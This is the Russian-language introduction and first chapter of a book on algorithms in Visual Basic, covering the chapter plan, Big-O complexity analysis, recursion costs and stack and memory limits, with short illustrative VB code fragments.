Далее следует «текст», который любой уважающий себя программист должен прочесть хотя бы один раз. (Это наше субъективное мнение)
Введение
Программирование под Windows всегда было нелегкой задачей. Интерфейс прикладного программирования (Application Programming Interface) Windows предоставляет в распоряжение программиста набор мощных, но не всегда безопасных инструментов для разработки приложений. Можно сравнить его с бульдозером, при помощи которого удается добиться поразительных результатов, но без соответствующих навыков и осторожности, скорее всего, дело закончится только разрушениями и убытками.
Эта картина изменилась с появлением Visual Basic. Используя визуальный интерфейс, Visual Basic позволяет быстро и легко разрабатывать законченные приложения. При помощи Visual Basic можно разрабатывать и тестировать сложные приложения без прямого использования функций API. Избавляя программиста от проблем с API, Visual Basic позволяет сконцентрироваться на деталях приложения.
Хотя Visual Basic и облегчает разработку пользовательского интерфейса, задача написания кода для реакции на входные воздействия, обработки их, и представления результатов ложится на плечи программиста. Здесь начинается применение алгоритмов.
Алгоритмы представляют собой формальные инструкции для выполнения сложных задач на компьютере. Например, алгоритм сортировки может определять, как найти конкретную запись в базе из 10 миллионов записей. В зависимости от класса используемых алгоритмов искомые данные могут быть найдены за секунды, часы или вообще не найдены.
В этом материале обсуждаются алгоритмы на Visual Basic и содержится большое число мощных алгоритмов, полностью написанных на этом языке. В ней также анализируются методы обращения со структурами данных, такими, как списки, стеки, очереди и деревья, и алгоритмы для выполнения типичных задач, таких как сортировка, поиск и хэширование.
Для того чтобы успешно применять эти алгоритмы, недостаточно их просто скопировать в свою программу. Необходимо кроме этого понимать, как различные алгоритмы ведут себя в разных ситуациях, что в конечном итоге и будет определять выбор наиболее подходящего алгоритма.
В этом материале поведение алгоритмов в типичном и наихудшем случаях описано доступным языком. Это позволит понять, чего вы вправе ожидать от того или иного алгоритма и распознать, в каких условиях встречается наихудший случай, и в соответствии с этим переписать или поменять алгоритм. Даже самый лучший алгоритм не поможет в решении задачи, если применять его неправильно.
=============xi
Все алгоритмы также представлены в виде исходных текстов на Visual Basic, которые вы можете использовать в своих программах без какихлибо изменений. Они демонстрируют использование алгоритмов в программах, а также важные характерные особенности работы самих алгоритмов.
Что дают вам эти знания
После ознакомления с данным материалом и примерами вы получите:
Понятие об алгоритмах. После прочтения данного материала и выполнения примеров программ, вы сможете применять сложные алгоритмы в своих проектах на Visual Basic и критически оценивать другие алгоритмы, написанные вами или кемлибо еще.
Большую подборку исходных текстов, которые вы сможете легко добавить к вашим программам. Используя код, содержащийся в примерах, вы сможете легко добавлять мощные алгоритмы к вашим приложениям.
Готовые примеры программ дадут вам возможность протестировать алгоритмы. Вы можете использовать эти примеры и модифицировать их для углубленного изучения алгоритмов и понимания их работы, или использовать их как основу для разработки собственных приложений.
Целевая аудитория
В этом материале обсуждаются углубленные вопросы программирования на Visual Basic. Они не предназначена для обучения программированию на этом языке. Если вы хорошо разбираетесь в основах программирования на Visual Basic, вы сможете сконцентрировать внимание на алгоритмах вместо того, чтобы застревать на деталях языка.
В этом материале изложены важные концепции программирования, которые могут быть с успехом применены для решения новых задач. Приведенные алгоритмы используют мощные программные методы, такие как рекурсия, разбиение на части, динамическое распределение памяти и сетевые структуры данных, которые вы можете применять для решения своих конкретных задач.
Даже если вы еще не овладели в полной мере программированием на Visual Basic, вы сможете скомпилировать примеры программ и сравнить производительность различных алгоритмов. Более того, вы сможете выбрать удовлетворяющие вашим требованиям алгоритмы и добавить их к вашим проектам на Visual Basic.
Совместимость с разными версиями Visual Basic
Выбор наилучшего алгоритма определяется не особенностями версии языка программирования, а фундаментальными принципами программирования.
=================xii
Некоторые новые понятия, такие как ссылки на объекты, классы и коллекции, которые были впервые введены в 4-й версии Visual Basic, облегчают понимание, разработку и отладку некоторых алгоритмов. Классы могут заключать некоторые алгоритмы в хорошо продуманных модулях, которые легко вставить в программу. Хотя для того, чтобы применять эти алгоритмы, необязательно разбираться в новых понятиях языка, эти новые возможности предоставляют слишком большие преимущества, чтобы ими можно было пренебречь.
Поэтому примеры алгоритмов в этом материале написаны для использования в 4-й и 5-й версиях Visual. Если вы откроете их в 5-й версии Visual Basic, среда разработки предложит вам сохранить их в формате 5-й версии, но никаких изменений в код вносить не придется. Все алгоритмы были протестированы в обеих версиях.
Эти программы демонстрируют использование алгоритмов без применения объектно-ориентированного подхода. Ссылки и коллекции облегчают программирование, но их применение может приводить к некоторому замедлению работы программ по сравнению со старыми версиями.
Тем не менее, игнорирование классов, объектов и коллекций привело бы к упущению многих действительно мощных свойств. Их использование позволяет достичь нового уровня модульности, разработки и повторного использования кода. Их, безусловно, необходимо иметь в виду, по крайней мере, на начальных этапах разработки. В дальнейшем, если возникнут проблемы с производительностью, вы сможете модифицировать код, используя более быстрые низкоуровневые методы.
Языки программирования зачастую развиваются в сторону усложнения, но редко в противоположном направлении. Замечательным примером этого является наличие оператора goto в языке C. Это неудобный оператор, потенциальный источник ошибок, который почти не используется большинством программистов на C, но он попрежнему остается в синтаксисе языка с 1970 года. Он даже был включен в C++ и позднее в Java, хотя создание нового языка было хорошим предлогом избавиться от него.
Так и новые версии Visual Basic будут продолжать вводить новые свойства в язык, но маловероятно, что из них будут исключены строительные блоки, использованные при применении алгоритмов, описанных в данном материале. Независимо от того, что будет добавлено в 6-й, 7-й или 8-й версии Visual Basic, классы, массивы и определяемые пользователем типы данных останутся в языке. Большая часть, а может и все алгоритмы из приведенных ниже, будут выполняться без изменений в течение еще многих лет.
Обзор глав
В 1 главе рассматриваются понятия, которые вы должны понимать до того, как приступить к анализу сложных алгоритмов. В ней изложены методы, которые потребуются для теоретического анализа вычислительной сложности алгоритмов. Некоторые алгоритмы с высокой теоретической производительностью на практике дают не очень хорошие результаты, поэтому в этой главе также затрагиваются практические соображения, например обращение к файлу подкачки и сравнивается использование коллекций и массивов.
Во 2 главе показано, как образуются различные виды списков с использованием массивов, объектов, и псевдоуказателей. Эти структуры данных можно с успехом применять во многих программах, и они используются в следующих главах
В 3 главе описаны два особых типа списков: стеки и очереди. Эти структуры данных используются во многих алгоритмах, включая некоторые алгоритмы, описанные в последующих главах. В конце главы приведена модель очереди на регистрацию в аэропорту.
В 5 главе обсуждается мощный инструмент — рекурсия. Рекурсия может быть также запутанной и приводить к проблемам. В 5 главе объясняется, в каких случаях следует применять рекурсию и показывает, как можно от нее избавиться, если это необходимо.
В 6 главе используются многие из ранее описанных приемов, такие как рекурсия и связные списки, для изучения более сложной темы — деревьев. Эта глава также охватывает различные представления деревьев, такие как деревья с полными узлами (fat node) и представление в виде нумерацией связей (forward star). В ней также описаны некоторые важные алгоритмы работы с деревьями, таки как обход вершин дерева.
В 7 главе затронута более сложная тема. Сбалансированные деревья обладают особыми свойствами, которые позволяют им оставаться уравновешенными и эффективными. Алгоритмы сбалансированных деревьев удивительно просто описываются, но их достаточно трудно реализовать программно. В этой главе используется одна из наиболее мощных структур подобного типа — Б+дерево (B+Tree) для создания сложной базы данных.
В 8 главе обсуждаются задачи, которые можно описать как поиск ответов в дереве решений. Даже для небольших задач, эти деревья могут быть гигантскими, поэтому необходимо осуществлять поиск в них максимально эффективно. В этой главе сравниваются некоторые различные методы, которые позволяют выполнить такой поиск.
Глава 9 посвящена, пожалуй, наиболее изучаемой области теории алгоритмов — сортировке. Алгоритмы сортировки интересны по нескольким причинам. Вопервых, сортировка — часто встречающаяся задача. Вовторых, различные алгоритмы сортировок обладают своими сильными и слабыми сторонами, поэтому не существует одного алгоритма, который показывал бы наилучшие результаты в любых ситуациях. И, наконец, алгоритмы сортировки демонстрируют широкий спектр важных алгоритмических методов, таких как рекурсия, пирамиды, а также использование генератора случайных чисел для уменьшения вероятности выпадения наихудшего случая.
В главе 10 рассматривается близкая к сортировке тема. После выполнения сортировки списка, программе может понадобиться найти элементы в нем. В этой главе сравнивается несколько наиболее эффективных методов поиска элементов в сортированных списках.
=========xiv
В главе 11 обсуждаются методы сохранения и поиска элементов, работающие даже быстрее, чем это возможно при использовании деревьев, сортировки или поиска. В этой главе также описаны некоторые методы хэширования, включая использование блоков и связных списков, и несколько вариантов открытой адресации.
В главе 12 описана другая категория алгоритмов — сетевые алгоритмы. Некоторые из этих алгоритмов, такие как вычисление кратчайшего пути, непосредственно применимы к физическим сетям. Эти алгоритмы также могут косвенно применяться для решения других задач, которые на первый взгляд не кажутся связанными с сетями. Например, алгоритмы поиска кратчайшего расстояния могут разбивать сеть на районы или определять критичные задачи в расписании проекта.
В главе 13 объясняются методы, применение которых стало возможным благодаря введению классов в 4й версии Visual Basic. Эти методы используют объектноориентированный подход для реализации нетипичного для традиционных алгоритмов поведения.
===================xv
Аппаратные требования
Для работы с примерами вам потребуется компьютер, конфигурация которого удовлетворяет требованиям для работы программной среды Visual Basic. Эти требования выполняются почти для всех компьютеров, на которых может работать операционная система Windows.
На компьютерах разной конфигурации алгоритмы выполняются с различной скоростью. Компьютер с процессором Pentium Pro с тактовой частотой 2000 МГц и 64 Мбайт оперативной памяти будет работать намного быстрее, чем машина с 386 процессором и всего 4 Мбайт памяти. Вы быстро узнаете, на что способно ваше аппаратное обеспечение.
Изменения во втором издании
Самое большое изменение в новой версии Visual Basic — это появление классов. Классы позволяют рассмотреть некоторые задачи с другой стороны, позволяя использовать более простой и естественный подход к пониманию и применению многих алгоритмов. Изменения в коде программ в этом изложении используют преимущества, предоставляемые классами. Их можно разбить на три категории:
Замена псевдоуказателей классами. Хотя все алгоритмы, которые были написаны для старых версий VB, все еще работают, многие из тех, что были написаны с применением псевдоуказателей (описанных во 2 главе), гораздо проще понять, используя классы.
Инкапсуляция. Классы позволяют заключить алгоритм в компактный модуль, который легко использовать в программе. Например, при помощи классов можно создать несколько связных списков и не писать при этом дополнительный код для управления каждым списком по отдельности.
Объектноориентированные технологии. Использование классов также позволяет легче понять некоторые объектноориентированные алгоритмы. В главе 13 описываются методы, которые сложно реализовать без использования классов.
Как пользоваться этим материалом
В главе 1 даются общие понятия, которые используются на протяжении всего изложения, поэтому вам следует начать чтение с этой главы. Вам стоит ознакомиться с этой тематикой, даже если вы не хотите сразу же достичь глубокого понимания алгоритмов.
В 6 главе обсуждаются понятия, которые используются в 7, 8 и 12 главах, поэтому вам следует прочитать 6 главу до того, как браться за них. Остальные главы можно читать в любом порядке.
=============xvi
В табл. 1 показаны три возможных учебных плана, которыми вы можете руководствоваться при изучении материала в зависимости от того, насколько широко вы хотите ознакомиться с алгоритмами. Первый план включает в себя освоение основных методов и структур данных, которые могут быть полезны при разработке вами собственных программ. Второй кроме этого описывает также основные алгоритмы, такие как алгоритмы сортировки и поиска, которые могут понадобиться при написании более сложных программ.
Последний план дает порядок для изучения всего материала целиком. Хотя 7 и 8 главы логически вытекают из 6 главы, они сложнее для изучения, чем следующие главы, поэтому они изучаются несколько позже.
Почему именно Visual Basic?
Наиболее часто встречаются жалобы на медленное выполнение программ, написанных на Visual Basic. Многие другие компиляторы, такие как Delphi, Visual C++ дают более быстрый и гибкий код, и предоставляют программисту более мощные средства, чем Visual Basic. Поэтому логично задать вопрос — «Почему я должен использовать именно Visual Basic для написания сложных алгоритмов? Не лучше было бы использовать Delphi или C++ или, по крайней мере, написать алгоритмы на одном из этих языков и подключать их к программам на Visual Basic при помощи библиотек?» Написание алгоритмов на Visual Basic имеет смысл по нескольким причинам.
Вопервых, разработка приложения на Visual C++ гораздо сложнее и проблематичнее, чем на Visual Basic. Некорректная реализация в программе всех деталей программирования под Windows может привести к сбоям в вашем приложении, среде разработки, или в самой операционной системе Windows.
Вовторых, разработка библиотеки на языке C++ для использования в программах на Visual Basic включает в себя много потенциальных опасностей, характерных и для приложений Windows, написанных на C++. Если библиотека будет неправильно взаимодействовать с программой на Visual Basic, она также приведет к сбоям в программе, а возможно и в среде разработки и системе.
В-третьих, многие алгоритмы достаточно эффективны и показывают неплохую производительность даже при применении не очень быстрых компиляторов, таких, как Visual Basic. Например, алгоритм сортировки подсчетом,
@Таблица 1. Планы занятий
===============xvii
описываемый в 9 главе, сортирует миллион целых чисел менее чем за 2 секунды на компьютере с процессором Pentium с тактовой частотой 233 МГц. Используя библиотеку C++, можно было бы сделать алгоритм немного быстрее, но скорости версии на Visual Basic и так хватает для большинства приложений. Скомпилированные при помощи 5й версией Visual Basic исполняемые файлы сводят отставание по скорости к минимуму.
В конечном счете, разработка алгоритмов на любом языке программирования позволяет больше узнать об алгоритмах вообще. По мере изучения алгоритмов, вы освоите методы, которые сможете применять в других частях своих программ. После того, как вы овладеете в совершенстве алгоритмами на Visual Basic, вам будет гораздо легче реализовать их на Delphi или C++, если это будет необходимо.
=============xviii
Глава 1. Основные понятия
В этой главе содержатся общие понятия, которые нужно усвоить перед началом серьезного изучения алгоритмов. Начинается она с вопроса «Что такое алгоритмы?». Прежде чем углубиться в детали программирования алгоритмов, стоит потратить немного времени, чтобы разобраться в том, что это такое.
Затем в этой главе дается введение в формальную теорию сложности алгоритмов (complexity theory). При помощи этой теории можно оценить теоретическую вычислительную сложность алгоритмов. Этот подход позволяет сравнивать различные алгоритмы и предсказывать их производительность в разных условиях. В главе приводится несколько примеров применения теории сложности к небольшим задачам.
Некоторые алгоритмы с высокой теоретической производительностью не слишком хорошо работают на практике, поэтому в данной главе также обсуждаются некоторые реальные предпосылки для создания программ. Слишком частое обращение к файлу подкачки или плохое использование ссылок на объекты и коллекции может значительно снизить производительность прекрасного в остальных отношениях приложения.
После знакомства с основными понятиями, вы сможете применять их к алгоритмам, изложенным в последующих главах, а также для анализа собственных программ для оценки их производительности и сможете предугадывать возможные проблемы до того, как они обернутся катастрофой.
Что такое алгоритмы?
Алгоритм – это последовательность инструкций для выполнения какоголибо задания. Когда вы даете комуто инструкции о том, как отремонтировать газонокосилку, испечь торт, вы тем самым задаете алгоритм действий. Конечно, подобные бытовые алгоритмы описываются неформально, например, так:
Проверьте, находится ли машина на стоянке.
Убедитесь, что машина поставлена на ручной тормоз.
Поверните ключ.
И т.д.
==========1
При этом по умолчанию предполагается, что человек, который будет следовать этим инструкциям, сможет самостоятельно выполнить множество мелких операций, например, отпереть и открыть дверь, сесть за руль, пристегнуть ремень, найти ручной тормоз и так далее.
Если же составляется алгоритм для исполнения компьютером, вы не можете полагаться на то, что компьютер поймет чтолибо, если это не описано заранее. Словарь компьютера (язык программирования) очень ограничен и все инструкции для компьютера должны быть сформулированы на этом языке. Поэтому для написания компьютерных алгоритмов используется формализованный стиль.
Интересно попробовать написать формализованный алгоритм для обычных ежедневных задач. Например, алгоритм вождения машины мог бы выглядеть примерно так:
Если дверь закрыта:
Вставить ключ в замок
Повернуть ключ
Если дверь остается закрытой, то:
Повернуть ключ в другую сторону
Повернуть ручку двери
И т.д.
Этот фрагмент «кода» отвечает только за открывание двери; при этом даже не проверяется, какая дверь открывается. Если дверь заело или в машине установлена противоугонная система, то алгоритм открывания двери может быть достаточно сложным.
Формализацией алгоритмов занимаются уже тысячи лет. За 300 лет до н.э. Евклид написал алгоритмы деления углов пополам, проверки равенства треугольников и решения других геометрических задач. Он начал с небольшого словаря аксиом, таких как «параллельные линии не пересекаются» и построил на их основе алгоритмы для решения сложных задач.
Формализованные алгоритмы такого типа хорошо подходят для задач математики, где должна быть доказана истинность какоголибо положения или возможность выполнения какихто действий, скорость же исполнения алгоритма не важна. Для выполнения реальных задач, связанных с выполнением инструкций, например задачи сортировки на компьютере записей о миллионе покупателей, эффективность выполнения становится важной частью постановки задачи.
Анализ скорости выполнения алгоритмов
Есть несколько способов оценки сложности алгоритмов. Программисты обычно сосредотачивают внимание на скорости алгоритма, но важны и другие требования, например, к размеру памяти, свободному месту на диске или другим ресурсам. От быстрого алгоритма может быть мало толку, если под него требуется больше памяти, чем установлено на компьютере.
Пространство — время
Многие алгоритмы предоставляют выбор между скоростью выполнения и используемыми программой ресурсами. Задача может выполняться
быстрее, используя больше памяти, или наоборот, медленнее, заняв меньший объем памяти.
===========2
Хорошим примером в данном случае может служить алгоритм нахождения кратчайшего пути. Задав карту улиц города в виде сети, можно написать алгоритм, вычисляющий кратчайшее расстояние между любыми двумя точками в этой сети. Вместо того чтобы каждый раз заново пересчитывать кратчайшее расстояние между двумя заданными точками, можно заранее просчитать его для всех пар точек и сохранить результаты в таблице. Тогда, чтобы найти кратчайшее расстояние для двух заданных точек, достаточно будет просто взять готовое значение из таблицы.
При этом мы получим результат практически мгновенно, но это потребует большого объема памяти. Карта улиц для большого города, такого как Бостон или Денвер, может содержать сотни тысяч точек. Для такой сети таблица кратчайших расстояний содержала бы более 10 миллиардов записей. В этом случае выбор между временем исполнения и объемом требуемой памяти очевиден: поставив дополнительные 10 гигабайт оперативной памяти, можно заставить программу выполняться гораздо быстрее.
Из этой связи вытекает идея пространственновременной сложности алгоритмов. При этом подходе сложность алгоритма оценивается в терминах времени и пространства, и находится компромисс между ними.
В этом материале основное внимание уделяется временной сложности, но мы также постарались обратить внимание и на особые требования к объему памяти для некоторых алгоритмов. Например, сортировка слиянием (mergesort), обсуждаемая в 9 главе, требует больше временной памяти. Другие алгоритмы, например пирамидальная сортировка (heapsort), которая также обсуждается в 9 главе, требует обычного объема памяти.
Оценка с точностью до порядка
При сравнении различных алгоритмов важно понимать, как сложность алгоритма соотносится со сложностью решаемой задачи. При расчетах по одному алгоритму сортировка тысячи чисел может занять 1 секунду, а сортировка миллиона — 10 секунд, в то время как расчеты по другому алгоритму могут потребовать 2 и 5 секунд соответственно. В этом случае нельзя однозначно сказать, какая из двух программ лучше — это будет зависеть от исходных данных.
Различие производительности алгоритмов на задачах разной вычислительной сложности часто более важно, чем просто скорость алгоритма. В вышеприведенном случае, первый алгоритм быстрее сортирует короткие списки, а второй — длинные.
Производительность алгоритма можно оценить по порядку величины. Алгоритм имеет сложность порядка O(f(N)) (произносится «О большое от F от N»), если время выполнения алгоритма растет пропорционально функции f(N) с увеличением размерности исходных данных N. Например, рассмотрим фрагмент кода, сортирующий положительные числа:
For I = 1 To N
'Поиск наибольшего элемента в списке.
MaxValue = 0
For J = 1 to N
If Value(J) > MaxValue Then
MaxValue = Value(J)
MaxJ = J
End If
Next J
'Вывод наибольшего элемента на печать.
Print Format$(MaxJ) & ":" & Str$(MaxValue)
'Обнуление элемента для исключения его из дальнейшего поиска.
Value(MaxJ) = 0
Next I
===============3
В этом алгоритме переменная цикла I последовательно принимает значения от 1 до N. Для каждого приращения I переменная J в свою очередь также принимает значения от 1 до N. Таким образом, в каждом внешнем цикле выполняется еще N внутренних циклов. В итоге внутренний цикл выполняется N*N или N2 раз и, следовательно, сложность алгоритма порядка O(N2).
При оценке порядка сложности алгоритмов используется только наиболее быстро растущая часть уравнения алгоритма. Допустим, время выполнения алгоритма пропорционально N3+N. Тогда сложность алгоритма будет равна O(N3). Отбрасывание медленно растущих частей уравнения позволяет оценить поведение алгоритма при увеличении размерности данных задачи N.
При больших N вклад второй части в уравнение N3+N становится все менее заметным. При N=100, разность N3+N=1.000.100 и N3 равна всего 100, или менее чем 0,01 процента. Но это верно только для больших N. При N=2, разность между N3+N =10 и N3=8 равна 2, а это уже 20 процентов.
Постоянные множители в соотношении также игнорируются. Это позволяет легко оценить изменения в вычислительной сложности задачи. Алгоритм, время выполнения которого пропорционально 3*N2, будет иметь порядок O(N2). Если увеличить N в 2 раза, то время выполнения задачи возрастет примерно в 22, то есть в 4 раза.
Игнорирование постоянных множителей позволяет также упростить подсчет числа шагов алгоритма. В предыдущем примере внутренний цикл выполняется N2 раз, при этом внутри цикла выполняется несколько инструкций. Можно просто подсчитать число инструкций If, можно подсчитать также инструкции, выполняемые внутри цикла или, кроме того, еще и инструкции во внешнем цикле, например операторы Print.
Вычислительная сложность алгоритма при этом будет пропорциональна N2, 3*N2 или 3*N2+N. Оценка сложности алгоритма по порядку величины даст одно и то же значение O(N3) и отпадет необходимость в точном подсчете количества операторов.
Поиск сложных частей алгоритма
Обычно наиболее сложным является выполнение циклов и вызовов процедур. В предыдущем примере, весь алгоритм заключен в двух циклах.
============4
Если процедура вызывает другую процедуру, необходимо учитывать сложность вызываемой процедуры. Если в ней выполняется фиксированное число инструкций, например, осуществляется вывод на печать, то при оценке порядка сложности ее можно не учитывать. С другой стороны, если в вызываемой процедуре выполняется O(N) шагов, она может вносить значительный вклад в сложность алгоритма. Если вызов процедуры осуществляется внутри цикла, этот вклад может быть еще больше.
Приведем в качестве примера программу, содержащую медленную процедуру Slow со сложностью порядка O(N3) и быструю процедуру Fast со сложностью порядка O(N2). Сложность всей программы будет зависеть от соотношения между этими двумя процедурами.
Если процедура Slow вызывается в каждом цикле процедуры Fast, порядки сложности процедур перемножаются. В этом случае сложность алгоритма равна произведению O(N2) и O(N3) или O(N3*N2)=O(N5). Приведем иллюстрирующий этот случай фрагмент кода:
Sub Slow()
Dim I As Integer
Dim J As Integer
Dim K As Integer
For I = 1 To N
For J = 1 To N
For K = 1 To N
' Выполнить какиелибо действия.
Next K
Next J
Next I
End Sub
Sub Fast()
Dim I As Integer
Dim J As Integer
Dim K As Integer
For I = 1 To N
For J = 1 To N
Slow ' Вызов процедуры Slow.
Next J
Next I
End Sub
Sub MainProgram()
Fast
End Sub
С другой стороны, если процедуры независимо вызываются из основной программы, их вычислительная сложность суммируется. В этом случае полная сложность будет равна O(N3)+O(N2)=O(N3). Такую сложность, например, будет иметь следующий фрагмент кода:
Sub Slow()
Dim I As Integer
Dim J As Integer
Dim K As Integer
For I = 1 To N
For J = 1 To N
For K = 1 To N
' Выполнить какиелибо действия.
Next K
Next J
Next I
End Sub
Sub Fast()
Dim I As Integer
Dim J As Integer
For I = 1 To N
For J = 1 To N
' Выполнить какиелибо действия.
Next J
Next I
End Sub
Sub MainProgram()
Slow
Fast
End Sub
==============5
Сложность рекурсивных алгоритмов
Рекурсивными процедурами (recursive procedure) называются процедуры, вызывающие сами себя. Во многих рекурсивных алгоритмах именно степень вложенности рекурсии определяет сложность алгоритма, при этом не всегда легко оценить порядок сложности. Рекурсивная процедура может выглядеть простой, но при этом вносить большой вклад в сложность программы, многократно вызывая саму себя.
Следующий фрагмент кода содержит подпрограмму всего из двух операторов. Тем не менее, для заданного N подпрограмма выполняется N раз, таким образом, вычислительная сложность фрагмента порядка O(N).
Sub CountDown(N As Integer)
If N <= 0 Then Exit Sub
CountDown N - 1
End Sub
===========6
Многократная рекурсия
Рекурсивный алгоритм, вызывающий себя несколько раз, является примером многократной рекурсии (multiple recursion). Процедуры с множественной рекурсией сложнее анализировать, чем просто рекурсивные алгоритмы, и они могут давать больший вклад в общую сложность алгоритма.
Нижеприведенная подпрограмма похожа на предыдущую подпрограмму CountDown, только она вызывает саму себя дважды:
Sub DoubleCountDown(N As Integer)
If N <= 0 Then Exit Sub
DoubleCountDown N - 1
DoubleCountDown N - 1
End Sub
Можно было бы предположить, что время выполнения этой процедуры будет в два раза больше, чем для подпрограммы CountDown, и оценить ее сложность порядка 2*O(N)=O(N). На самом деле ситуация немного сложнее.
Если T(N) — число раз, которое выполняется процедура DoubleCountDown с параметром N, то легко заметить, что T(0)=1. Если вызвать процедуру с параметром N равным 0, то она просто закончит свою работу после первого шага.
Для больших значений N процедура вызывает себя дважды с параметром, равным N-1, выполняясь 1+2*T(N-1) раз. В табл. 1.1 приведены некоторые значения функции T(0)=1 и T(N)=1+2*T(N-1). Если обратить внимание на эти значения, можно увидеть, что T(N)=2(N+1)-1, что дает оценку сложности процедуры порядка O(2N). Хотя процедуры CountDown и DoubleCountDown и похожи, вторая процедура требует выполнения гораздо большего числа шагов.
@Таблица 1.1. Значения функции времени выполнения для подпрограммы DoubleCountDown
Косвенная рекурсия
Процедура также может вызывать другую процедуру, которая в свою очередь вызывает первую. Такие процедуры иногда даже сложнее анализировать, чем процедуры с множественной рекурсией. Алгоритм вычисления кривой Серпинского, который обсуждается в 5 главе, включает в себя четыре процедуры, которые используют как множественную, так и непрямую рекурсию. Каждая из этих процедур вызывает себя и другие три процедуры до четырех раз. После довольно сложных подсчетов можно показать, что этот алгоритм имеет сложность порядка O(4N).
Требования рекурсивных алгоритмов к объему памяти
Для некоторых рекурсивных алгоритмов важен объем доступной памяти. Можно легко написать рекурсивный алгоритм, который будет запрашивать
============7
небольшой объем памяти при каждом своем вызове. Объем занятой памяти может увеличиваться в процессе последовательных рекурсивных вызовов.
Поэтому для рекурсивных алгоритмов необходимо хотя бы приблизительно оценивать требования к объему памяти, чтобы убедиться, что программа не исчерпает при выполнении всю доступную память.
Приведенная ниже подпрограмма запрашивает память при каждом вызове. После 100 или 200 рекурсивных вызовов, процедура займет всю свободную память, и программа аварийно остановится с ошибкой «Out of Memory».
Sub GobbleMemory(N As Integer)
Dim Array() As Integer
ReDim Array (1 To 32000)
GobbleMemory N + 1
End Sub
Даже если внутри процедуры память не запрашивается, система выделяет память из системного стека (system stack) для сохранения параметров при каждом вызове процедуры. После возврата из процедуры память из стека освобождается для дальнейшего использования.
Если в подпрограмме встречается длинная последовательность рекурсивных вызовов, программа может исчерпать стек, даже если выделенная программе память еще не вся использована. Если запустить на исполнение следующую подпрограмму, она быстро исчерпает всю свободную стековую память и программа аварийно прекратит работу с сообщением об ошибке «Out of stack Space». После этого вы сможете узнать значение переменной Count, чтобы узнать, сколько раз подпрограмма вызывала себя перед тем, как исчерпать стек.
Sub UseStack()
Static Count As Integer
Count = Count + 1
UseStack
End Sub
Определение локальных переменных внутри подпрограммы также может занимать память из стека. Если изменить подпрограмму UseStack из предыдущего примера так, чтобы она определяла три переменных при каждом вызове, программа исчерпает стековое пространство еще быстрее:
Sub UseStack()
Static Count As Integer
Dim I As Variant
Dim J As Variant
Dim K As Variant
Count = Count + 1
UseStack
End Sub
В 5 главе рекурсивные алгоритмы обсуждаются более подробно.
==============8
Наихудший и усредненный случай
Оценка с точностью до порядка дает верхний предел сложности алгоритма. То, что программа имеет определенный порядок сложности, не означает, что алгоритм будет действительно выполняться так долго. При определенных исходных данных, многие алгоритмы выполняются гораздо быстрее, чем можно предположить на основании их порядка сложности. Например, следующий код реализует простой алгоритм выбора элемента из списка:
Function LocateItem(target As Integer) As Integer
For I = 1 To N
If Value(I) = target Then Exit For
Next I
LocateItem = I
End Sub
Если искомый элемент находится в конце списка, придется перебрать все N элементов для того, чтобы его найти. Это займет N шагов, значит сложность алгоритма порядка O(N). В этом, так называемом наихудшем случае (worst case) время выполнения алгоритма будет наибольшим.
С другой стороны, если искомое число в начале списка, алгоритм завершит работу практически сразу, совершив всего несколько итераций. Это так называемый наилучший случай (best case) со сложностью порядка O(1). Обычно и наилучший, и наихудший случаи встречаются относительно редко, и интерес представляет оценка усредненного или ожидаемого (expected case) поведения.
Если первоначально числа в списке распределены случайно, искомый элемент может оказаться в любом месте списка. В среднем потребуется проверить N/2 элементов для того, чтобы его найти. Значит, сложность этого алгоритма в усредненном случае порядка O(N/2), или O(N), если убрать постоянный множитель.
Для некоторых алгоритмов порядок сложности для наихудшего и наилучшего вариантов различается. Например, сложность алгоритма быстрой сортировки из 9 главы в наихудшем случае порядка O(N2), но в среднем его сложность порядка O(N*log(N)), что намного быстрее. Иногда алгоритмы типа быстрой сортировки бывают очень длинными, чтобы наихудший случай достигался крайне редко.
Часто встречающиеся функции оценки порядка сложности
В табл. 1.2 приведены некоторые функции, которые обычно встречаются при оценке сложности алгоритмов. Функции приведены в порядке возрастания вычислительной сложности сверху вниз. Это значит, что алгоритмы со сложностью порядка функций, расположенных вверху таблицы, будут выполняться быстрее, чем те, сложность которых определяется функциями из нижней части таблицы.
==============9
@Таблица 1.2. Часто встречающиеся функции оценки порядка сложности
Сложность алгоритма, определяемая уравнением, которое представляет собой сумму функций из таблицы, будет сводиться к сложности той из функций, которая расположена в таблице ниже. Например, O(log(N)+N2) — это то же самое, что и O(N2).
Обычно алгоритмы со сложностью порядка N*log(N) и менее сложных функций выполняются очень быстро. Алгоритмы порядка NC при малых C, например N2 выполняются достаточно быстро. Вычислительная же сложность алгоритмов, порядок которых определяется функциями CN или N! очень велика и эти алгоритмы пригодны только для решения задач с небольшим N.
В качестве примера в табл. 1.3 показано, как долго компьютер, выполняющий миллион инструкций в секунду, будет выполнять некоторые медленные алгоритмы. Из таблицы видно, что при сложности порядка O(CN) могут быть решены только небольшие задачи, и еще меньше параметр N может быть для задач со сложностью порядка O(N!). Для решения задачи порядка O(N!) при N=24 потребовалось бы время, большее, чем время существования вселенной.
Логарифмы
Перед тем, как продолжить дальше, следует остановиться на логарифмах, так как они играют важную роль в различных алгоритмах. Логарифм числа N по основанию B это степень P, в которую надо возвести основание, чтобы получить N, то есть BP=N. Например, если 23=8, то соответственно log2(8)=3.
==================10
@Таблица 1.3. Время выполнения сложных алгоритмов
Можно привести логарифм к другому основанию при помощи соотношения logB(N)=logC(N)/logC(B). Например, чтобы вычислить логарифм числа по основанию 10, зная его логарифм по основанию 2, можно воспользоваться формулой log10(N)=log2(N)/log2(10). При этом log2(10) — это табличная константа, примерно равная 3,32. Так как постоянные множители при оценке сложности алгоритма можно опустить, то O(log2(N)) — это же самое, что и O(log10(N)) или O(logB(N)) для любого B. Поскольку основание логарифма не имеет значения, часто просто пишут, что сложность алгоритма порядка O(log(N)).
В программировании часто встречаются логарифмы по основанию 2, что обусловлено применяемой в компьютерах двоичной системой исчисления. Поэтому мы для упрощения выражений будем везде писать log(N), подразумевая под этим log2(N). Если используется другое основание алгоритма, это будет обозначено особо.
Реальные условия — насколько быстро?
Хотя при исследовании сложности алгоритма обычно полезно отбросить малые члены уравнения и постоянные множители, иногда их всетаки необходимо учитывать, особенно если размерность данных задачи N мала, а постоянные множители достаточно велики.
Допустим, мы рассматриваем два алгоритма решения одной задачи. Один выполняется за время порядка O(N), а другой — порядка O(N2). Для больших N первый алгоритм, вероятно, будет работать быстрее.
